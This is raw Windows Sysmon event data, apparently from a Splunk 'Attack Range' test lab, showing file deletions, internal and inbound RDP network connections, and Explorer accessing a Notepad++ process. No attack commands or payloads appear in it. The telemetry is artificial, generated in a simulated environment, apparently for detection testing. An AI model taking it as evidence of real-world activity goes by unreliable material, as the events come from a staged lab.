08:06:34.235{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7900F6109C64FD80E284AC337986CD52,SHA256=28102932BD43E3D1A20AB66F9357526483BBCE86141BEA795D9187DA573D51C7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810198Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:32.243{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57447-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001054257Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:35.814{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEC236A2A184BA27F27D53AA44674AE3,SHA256=9438BF79EA8469F331F3758E83941F8E85871188469A154F5BD76E1A80B64640,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810200Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:35.240{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2FBC0218950535923C9989ADB513961,SHA256=76D44CBA84E8C550EB0137BA60227465D6C22AEBC39268BAE0D3D9D28FDD5146,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054258Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:36.831{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B29C63BF506B8E7CD60A205E84D3DBE4,SHA256=5A3D2794001456076ABDEBBB0905693B17910F97AADBD0296AC5487261B37C85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810201Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:36.240{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62AA8E9ECCF4713D2BC3C035D3BD8BFA,SHA256=E6CCF02451934E6D320B05C66BB856BB906E93D9E318D9810FB36B5C00CD41D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054259Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:37.852{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAD922C99B4E4EF3142B0BAF13FD9686,SHA256=DFDAA4C02F9F40638FFE6209F4C8C8074FFBBFB2AA9B3C5AF7E69F7F41E47FE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810202Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:37.256{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38EF1F1835A4D4C32A2D8107F940E654,SHA256=021D4EDDE920FB0DD97A1F65F8DA67A7CDAF641B2D3C0DA536BB63F276BED522,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054272Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:38.884{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D85744BF5B9C06ABBD50615587657E1,SHA256=EF35EC0EEF7B29773E84DD7D5C86B47D74ED054213E993BC490B839141DD195E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810203Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:38.256{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4542E568AE2597875EE415282D2EB84D,SHA256=05119759E3457DE572DCE0FAD3A44E92026E25F1EF166DEF8939A52376B33CA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054271Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:38.684{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=26E64695E1DCEA0EE91E359A9234A3DB,SHA256=6C77D9DF4B82E42472434EF6E83A175F20CE60C54E6816F20B8AFA87C27BFDE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054270Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:38.684{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7D6E9FDC8E0243CB76487B0227040286,SHA256=D3B4BF3175CB95CEBC2E1F6C4F73896C45CE2BCD3B2FA4FC1FE2575EEFED3EE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054269Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:38.668{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=75FA755B38FF8266B2EA481D8F23C99B,SHA256=324B5C4E93ACCA633D2292A5989D5C0DC9E4BC6782FEAC308582CB544563637B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054268Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:38.668{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=41FDBE2D09FD542790894903EF23774C,SHA256=955C490B908D6BEB0C02222A05CA44C1EDA2D0B1F6904027CF60A2AD8EBF71CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054267Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:38.668{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D88EBDBE70457889A57E5CFFB5DC448C,SHA256=FFCF6DB1EB27B9601F6CD6238C1D914F436B86451D74A80C5C66A022A3F0EA2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054266Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:38.668{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2D61ABFB532D8B434CA19848F5D3F092,SHA256=7CFC99FEB6FFABB18948903E25F8BBD395A5E2EB45F2D0F9957AF4A9501EAA94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054265Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:38.668{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4153549C5FA41C3C161A82615A59B811,SHA256=A8248840C631B4C2F2259630E6D7FB9FF6A679A0AC08081410559CD4F795E2B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054264Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:38.668{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=34004BEE4DB10736683E95E7C62226FA,SHA256=2F17C15505BB9659B42D89605758AB7D755B73B33A3ECD71FBAF81A0E7EDF9BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054263Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:38.668{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=728C35BFBD7629F1B4BE567F91762F80,SHA256=D96F7E447F5CE9E88D1A4AF760E4F6E45A2CC57BB54124E3D3EBA4754A046942,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054262Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:38.668{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=18D18CD95BDCBE1AF8DF8B9CCBAD9DED,SHA256=42F32AE26B4DA040D9D9F6DAC16FF0D552E806B275758460E39FC44965948227,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054261Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:38.668{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=84AF544275D3ADB5CC824B98272A5A38,SHA256=6CB2903501F00CE4C864C3E66F744B35EF1CF87FE0DAAEB12F5B3E3BA4161F43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054260Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:38.668{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=2517E992168012F3629A0E4765128C27,SHA256=5F95D92BCFDEAF04C2F3C341B16E519375FDD7CD843385DBC4310F6294EEDEF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054273Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:39.884{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=436260ACCD55A7A3A51990A287F4CB34,SHA256=91D7369619218DCD97953147993C4727C041397B6DD5F97F4B3220F1D8258D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810205Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:39.256{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C793D4395A877706D1F7276DCC2D796,SHA256=D3818F1C2484183C1099297E1C12CA917B4E1EC38ABD107A26DA83BD54E3E648,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810204Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:37.248{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57448-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001054275Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:40.899{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=850532CB06871CCCFDA2384DD9ADADD7,SHA256=93902ED45518212F5ABB330757B76E3CDCE07E51B126E01A7F00E69AD804AAE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810206Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:40.271{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B425641F4AE634F2CA9375A20D6635B,SHA256=AB1FB2403C341CA2502DFF6FF6415719552EDEA0C30DE782C7BB4B97D209164C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054274Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:31.680{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61950-false10.0.1.12-8000- 23542300x80000000000000001054276Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:41.900{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C63EF6A25F4F87512A94219B3411B88D,SHA256=2711AE1A5FFBDE0D8715D88441B76DCBBDCC1233356E5042FCA2D444755667A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810207Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:41.271{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02022D5611E1A9E7603510FA255EFB5F,SHA256=0AA9ADC7E0FDF8B6FFA8B01AB846D01998F3A33A33DEC8EE23C8897A7A9D8D7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054280Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:42.915{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=484091D351E509A649F8DA3F1E054FEE,SHA256=065491BFA75A9EBECFFAD894D0933EB732BC5AB4F35E81ABA01992E89EE67206,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810208Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:42.349{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AF2B55FB8C6DCE0EC73C7C9A0E2B7BB,SHA256=973949C9986F05E1B5AA89894EC2E4CDBCDDF00C3EEFA6E2D39B6591CE35630A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054279Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:34.942{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-50011-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001054278Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:42.768{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=249E327DCFBE9E00F94DAFF7A8CE4F49,SHA256=DEF7BE7DCE5B323B23C6E9B57A03577D08DEF3792064911D34869D37FB6E789A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054277Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:42.768{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0B3DAC3257B90248045FD918D96214C6,SHA256=8D9EC7B569636414B169A79F0F5731830C08D988B9523BF2B5893C00CE0E1E1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054281Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:43.932{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF37F110E0CB87A1A239EB232567F67B,SHA256=41E5463CBD2EA181402C8E81D31EA73F6BDF87DE8F849B4E2F1E32E858CCD0FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810209Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:43.381{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F7B475793F8BFA9F81731C5ED98374C,SHA256=0F25A7961479D318D20047C6C08E199B7961407F82B80F9868185639EE081BAC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054283Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:36.727{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61951-false10.0.1.12-8000- 23542300x80000000000000001054282Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:44.950{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=163C927AD076E06C63B1F1FD40FEFE92,SHA256=24D0127AEDFA3BCE6EBD8501585D96030032E1AA119BDBC1AB1B46AD661C30B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810211Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:44.381{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E590E5D681973FA9B80C023ACA9B9C1E,SHA256=F92E8D37925AD027596009614FF9FE3973F8F7D587F28ED98F9297C6B0FEDBDF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810210Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:43.279{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57449-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001054285Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:37.792{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57450-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001054284Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:45.981{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9751B12110410638789C1B4E91AF28F,SHA256=C534BBA707DA78B7554A42F5C5C9DAE6878316165B1C0F2B7A4861F8D895AB9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810215Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:45.427{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5A21504CF7FD0F4D8A239D1537830D1,SHA256=93EB4BD9D0D23F26084CF59170088626E251DD4A1C42603BA5C63FE28EBF59E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810214Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:44.116{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-37237-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000810213Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:45.271{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9807F1D7680269CF34454697583D8A68,SHA256=8F23BBED3999905C23212CF32C8DA624F75C91CE62AFBC3F0C9FA9CDAEF7334A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810212Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:45.271{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F8FEA4A7CFACD5C9AE669C8A95CEB283,SHA256=FAC4100517DABE90882757F31FAB4D2A0A5C494464FCBEDA8EADEB5D529D45FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810217Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:46.537{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F78B11BDEE21BCAF840D5F604D5C05D5,SHA256=22530E9CB57B751236811013161ACC46417A19E7A2FA544587BC70D1FA22D154,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054287Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:46.396{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054286Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:46.396{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000810216Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:44.416{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57450-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000810218Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:47.552{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCF0B7705686ACBC5F7CF200A2C12DC0,SHA256=377783776205B4A20B5B91B1E7A4251F79CB4D354047EDAB359931140FAD5CE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054288Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:46.996{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 